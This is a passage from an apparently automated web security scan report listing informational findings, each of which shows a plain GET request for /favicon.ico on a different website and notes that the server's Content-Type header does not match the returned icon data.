The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fortunecity.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:52:41 GMT
Server: Apache/1.3.41 (Unix) PHP/5.3.0
Last-Modified: Mon, 24 Aug 2009 23:04:18 GMT
ETag: "593c6dd-338-4a931c72"
Accept-Ranges: bytes
Content-Length: 824
Connection: close
Content-Type: text/plain

BM8.......6...(..................................................................................................................\\\..........................................zzz...]]].................
...[SNIP]...
27.85. http://www.freecause.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freecause.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freecause.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Sat, 02 Apr 2011 13:31:42 GMT
Content-Type: text/plain; charset=UTF-8
Last-Modified: Thu, 03 Mar 2011 19:30:48 GMT
ETag: "12f4b79-47e-1105ea00"
Accept-Ranges: bytes
Content-Length: 1150
P3P: CP=NOI DSP COR TAIa PSAa PSDa OUR IND UNI OTC policyref="http://www.freecause.com/w3c/p3p.xml"

............ .h.......(....... ..... .....@....................................M...^.f.c...e...f...e...b...Z...............................[.@.d...l...o...t...x...v...q...i...b.......................]
...[SNIP]...
27.86. http://www.freeonlinegames.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freeonlinegames.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeonlinegames.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:16 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 24 Mar 2010 16:48:10 GMT
ETag: "18090c0-47e-b1fda680"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... .....@.......................................................................................................................................................xxx...
...[SNIP]...
27.87. http://www.freeze.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freeze.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freeze.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:16 GMT
Content-Length: 103

The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.
27.88. http://www.freshdeals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.freshdeals.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.freshdeals.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 08 Sep 2010 21:58:53 GMT
ETag: "1b0018-57e-48fc69e8a4140"
Accept-Ranges: bytes
Content-Length: 1406
P3P: policyref="http://www.freshdeals.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=552517
Expires: Fri, 08 Apr 2011 23:08:58 GMT
Date: Sat, 02 Apr 2011 13:40:21 GMT
Connection: close

..............h.......(....... .........................................................................................................................................................................
...[SNIP]...
27.89. http://www.funbrain.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.funbrain.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.funbrain.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:27:15 GMT
ETag: "436-3ba36634b1fc0"
Expires: Sat, 02 Apr 2011 13:27:15 GMT
Last-Modified: Tue, 01 Apr 2003 03:28:07 GMT
Server: Apache
Set-Cookie: Apache=10.243.58.175.1301750835307007; path=/; expires=Sun, 01-Apr-12 13:27:15 GMT; domain=.funbrain.com
Content-Length: 1078
Connection: keep-alive

..............(...&... ..........N...(....... .........................................................................................................................................................
...[SNIP]...
27.90. http://www.gamehouse.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gamehouse.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamehouse.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:37 GMT
Server: Apache/2.2.11 (CentOS)
Last-Modified: Tue, 11 Nov 2008 01:40:48 GMT
ETag: "58b82a5-436-45b5ff805e800"
Accept-Ranges: bytes
Content-Length: 1078
Content-Type: text/plain; charset=UTF-8
Set-Cookie: NSC_xxx-hbnfipvtf=ffffffffaf16e33c45525d5f4f58455e445a4a423660;expires=Sun, 03-Apr-2011 15:07:42 GMT;path=/;domain=gamehouse.com

...... ..........&...........(.......(... ...@.........................................................................................................................................................
...[SNIP]...
27.91. http://www.gamevance.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gamevance.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamevance.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:53:26 GMT
Server: Apache
Last-Modified: Fri, 23 Jul 2010 08:31:15 GMT
ETag: "380265-47e-48c09dbad3ac0"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=18000
Expires: Sat, 02 Apr 2011 18:53:26 GMT
Vary: User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ........................................    ...........................,....................................................X.................."...    ..................
...[SNIP]...
27.92. http://www.gamewinners.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gamewinners.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gamewinners.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:45:26 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 23 Nov 2001 01:42:32 GMT
ETag: "1087a2-13e-54177200"
Accept-Ranges: bytes
Content-Length: 318
Content-Type: text/plain; charset=UTF-8
Age: 1
X-Cache: HIT from www.gamewinners.com
X-Cache-Lookup: HIT from www.gamewinners.com:80
Via: 1.0 www.gamewinners.com:80 (squid/2.6.STABLE16)
Connection: keep-alive

..............(.......(....... ...................................{...s...k...c{..Zs..Zk..Rc..JZ..JR{.BJk.:BZ.!):.............vS.3C!&.wc%...&.wt{...X...y...y...B%.CX..."|.cH..t#...W..d#Q.Dh.."#3'UfzX.
...[SNIP]...
27.93. http://www.gardenweb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gardenweb.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gardenweb.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:50 GMT
Server: Apache
Last-Modified: Sun, 10 Mar 2002 16:42:12 GMT
ETag: "1ecab5-57e-39bd85e920100"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@........................................h....................................................................................................................
...[SNIP]...
27.94. http://www.genealogy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.genealogy.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.genealogy.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Set-Cookie: SessionID=991df4142c2bdfff4d973003; path=/; domain=.genealogy.com; expires=Friday, 31-Dec-2010 23:59:59 GMT
Set-Cookie: GComStoreData=%0ASIT%3D001f39142c56ebff4d973003; domain=.genealogy.com; path=/;
X-ServerName: SN:gweb07:
Last-Modified: Thu, 03 May 2007 15:39:07 GMT
ETag: "297817-e36-463a021b"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerwww.genealogy.com=119122112.20480.0000; path=/

..............h...&... ..............(....... ...........@......................................J...........a.../.......]...................r...<...!...........g...................Q...(...B...x...W.
...[SNIP]...
27.95. http://www.gossipcenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gossipcenter.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gossipcenter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (CentOS)
Last-Modified: Tue, 23 Mar 2010 18:00:05 GMT
Cache-Control: max-age=1209600
Content-Type: text/plain; charset=UTF-8
Content-Length: 3638
X-Cacheable: YES
Date: Sat, 02 Apr 2011 13:25:25 GMT
X-Varnish: 2537449880 2537448401
Age: 1
Via: 1.1 varnish
Connection: keep-alive
X-Cache: HIT
X-Cache-Hits: 1

..............h...&... ..............(....... ...........@...........................I..>$\..j.._7.......X..O.u..    ..pA..0.G..R..._..(.:.G)h.h<..W2......c..wE...!..T...M..9!T..^..,.A.K,o.S0{.c9..[5
...[SNIP]...
27.96. http://www.gourmandia.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.gourmandia.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.gourmandia.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:42 GMT
Server: Apache
Last-Modified: Wed, 25 Nov 2009 21:47:28 GMT
ETag: "66880ab-e36-1415c00"
Accept-Ranges: bytes
Content-Length: 3638
Connection: close
Content-Type: text/plain

..............h...&... ..............(....... ...........@...........................4.......,Q{.8U...$f.M...(0..I......)K..G...F}.."4..$?n...i.:b..9w......C...?k...'~.5X..&2v.E...(;..#>..=......."-
...[SNIP]...
27.97. http://www.greenwichmeantime.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.greenwichmeantime.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.greenwichmeantime.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:31 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Tue, 20 Dec 2005 15:01:41 GMT
ETag: "c8c01e-57e-f340d0c0"
Accept-Ranges: bytes
Content-Length: 1406
Connection: close
Content-Type: text/plain

..............h.......(....... ...........@.............................................................................................................................................................
...[SNIP]...
27.98. http://www.harvard.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.harvard.edu
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.harvard.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:01:01 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 22 Oct 2010 04:10:38 GMT
ETag: "2d98606-47e-d332ab80"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .h.......(....... ..... ....................................................q**.....d................................................ZZ..............vv....................................
...[SNIP]...
27.99. http://www.hiexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hiexpress.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hiexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "e6ba-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:36:17 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:36:17 GMT
Connection: close
Set-Cookie: TLTSID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com
Set-Cookie: TLTUID=2FD741865D2E105D041AB024DF96EAB9; Path=/; Domain=.hiexpress.com; expires=Sat, 02-04-2021 13:36:17 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.hiexpress.com;path=/

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
27.100. http://www.holidayinn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.holidayinn.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.holidayinn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Thu, 11 Jun 2009 15:08:05 GMT
ETag: "3c877-47e-4a311dd5"
Accept-Ranges: bytes
Content-Length: 1150
Expires: Sat, 02 Apr 2011 13:33:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:33:20 GMT
Connection: close
Set-Cookie: TLTSID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com
Set-Cookie: TLTUID=C6463A385D2D105D01AFD68221F72F8C; Path=/; Domain=.holidayinn.com; expires=Sat, 02-04-2021 13:33:20 GMT
Set-Cookie: datacenternode=us-md-vz;domain=.holidayinn.com;path=/

............ .h.......(....... ..... .............................................................................................-.5.5.<.C.M.F.Y.B.N.5.L..r..*p..<.N.A.B.B.@.D.A.../.<.3...........    ...
...[SNIP]...
27.101. http://www.hollywoodreporter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.hollywoodreporter.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.hollywoodreporter.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/plain; charset=UTF-8
Last-Modified: Sun, 03 Oct 2010 20:25:16 GMT
Cache-Control: max-age=132497
Expires: Mon, 04 Apr 2011 02:33:12 GMT
Date: Sat, 02 Apr 2011 13:44:55 GMT
Content-Length: 11502
Connection: close

..............h...6... ..............00..........F...(....... ...........@..........................................................................................
...[SNIP]...
27.102. http://www.home-remedies-for-you.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.home-remedies-for-you.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.home-remedies-for-you.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:20:05 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 08 Jun 2009 06:45:25 GMT
ETag: "2a40073-47e-46bd096402b40"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: text/plain

............ .h.......(....... ..... ........................................    ....1.L|..*... ...#...+.C.bx...'............................]................................'....*.....................
...[SNIP]...
27.103. http://www.ichotelsgroup.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ichotelsgroup.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ichotelsgroup.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41 (Unix) Communique/4.0.4 mod_ssl/2.8.31 OpenSSL/0.9.8a
Content-Type: text/plain; charset=utf-8
P3P: CP="OTI DSP COR DEVa OUR NOR",policyref="http://dcs.ichotelsgroup.com/w3c/p3p.xml"
Last-Modified: Fri, 09 May 2008 23:45:44 GMT
ETag: "4158-57e-4824e228"
Accept-Ranges: bytes
Content-Length: 1406
Expires: Sat, 02 Apr 2011 13:37:25 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:37:25 GMT
Connection: close
Set-Cookie: TLTSID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com
Set-Cookie: TLTUID=587EC2EE5D2E105D0C7CAE80051D85A1; Path=/; Domain=.ichotelsgroup.com; expires=Sat, 02-04-2021 13:37:25 GMT

..............h.......(....... ........................................................................ @.. `.. ... ... ... ...@...@ ..@@..@`..@...@...@...@...`...` ..`@..``..`...`...`...`........ ...
...[SNIP]...
27.104. http://www.imagevenue.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.imagevenue.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.imagevenue.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:38:52 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 02 May 2010 05:00:40 GMT
ETag: "1a51266-25be-5b95ae00"
Accept-Ranges: bytes
Content-Length: 9662
Connection: close
Content-Type: text/plain; charset=UTF-8

......00.... ..%......(...0...`..... ..............................#'..."... ... .........|.......................Hlr.-X[.0[^.-RV.,JO...$......
...'/.+DN.E^h.Iam.Zmz.<IW.,3B.        ...........,7.>P[.9KV.Pb
...[SNIP]...
27.105. http://www.inc.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.inc.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.inc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:44 GMT
Server: VoxCAST
Last-Modified: Mon, 02 Apr 2007 20:48:57 GMT
ETag: "98f473-229e-42d275998c040"
Accept-Ranges: bytes
Content-Length: 8862
Cache-Control: max-age=259200
Expires: Sat, 02 Apr 2011 14:49:16 GMT
Age: 257428
X-Cache: HIT from VoxCAST
Content-Type: text/plain; charset=UTF-8

..............h...f...........h....... ......0...6    .. ..........f
.. ..........N.. ..............(....... ...........@.............................................................................
...[SNIP]...
27.106. http://www.infomash.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.infomash.org
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infomash.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:37 GMT
Server: Apache
Last-Modified: Thu, 05 Aug 2010 13:13:44 GMT
ETag: "14301f9-57e-48d1351da5200"
Accept-Ranges: bytes
Content-Length: 1406
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ...........@.....................J...P...o...|...s...c...t...x...{...f..._...............................................f.........mlm.yxz.....sqt.........onp.........dc
...[SNIP]...
27.107. http://www.infowars.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.infowars.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.infowars.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
ETag: "35581af-47e-663f75c0"
Accept-Ranges: bytes
Cache-Control: max-age=290304000, public
Content-Type: text/plain; charset=UTF-8
Age: 67809395
Date: Sat, 02 Apr 2011 13:42:30 GMT
Last-Modified: Fri, 16 May 2008 03:13:35 GMT
Expires: Wed, 13 Jun 2018 04:12:46 GMT
Content-Length: 1150
Connection: keep-alive

............ .h.......(....... ..... ...................................................................................................P.......2.......Y.......A...........]...~.......j...............
...[SNIP]...
27.108. http://www.ivillage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ivillage.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a BMP image.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ivillage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/plain; charset=UTF-8
Accept-Ranges: bytes
Last-Modified: Thu, 04 Nov 2010 02:16:04 GMT
Content-Length: 1334
Date: Sat, 02 Apr 2011 13:25:48 GMT
Connection: close

BM6.......6...(......................................."4..$4..$3.."4..#5..%4..'5..$6..(6..&2..0@..1A..L[..Ye..Xg..Zg..[f..\g..]f..\e..]g..]h..[h..gt..kt..x~............................................
...[SNIP]...
27.109. http://www.jango.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jango.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jango.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:46 GMT
Server: Apache
Last-Modified: Fri, 20 Aug 2010 19:24:57 GMT
ETag: "3e01c9-56ee-48e46410bf440"
Accept-Ranges: bytes
Content-Length: 22254
Connection: close
Content-Type: text/plain; charset=UTF-8

............ .....6... .... .........@@.... .(B......(............. .............................kM0.jL/3iJ.4hJ,6D0.I7$...u^.........dH/./".]^D*9mO2.....kM0.jL/.gJ..dH-.cF+.J5 .{aJ.................cH
...[SNIP]...
27.110. http://www.jcwhitney.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jcwhitney.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jcwhitney.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 17 Sep 2009 05:40:13 GMT
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:52:00 GMT
Content-Length: 1150
Connection: close

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
27.111. http://www.joann.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.joann.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.joann.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R3374572646; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Date: Sat, 02 Apr 2011 13:42:35 GMT
Set-Cookie: ACE_COOKIE=R1260911085; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Server: Apache
Last-Modified: Fri, 23 Oct 2009 14:46:01 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 894

..............h.......(....... ...............................1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
1;
KT)elGelGKT)1;
1;
1;
1;
1;

...[SNIP]...
27.112. http://www.jobsonline.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.jobsonline.net
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jobsonline.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 200 OK
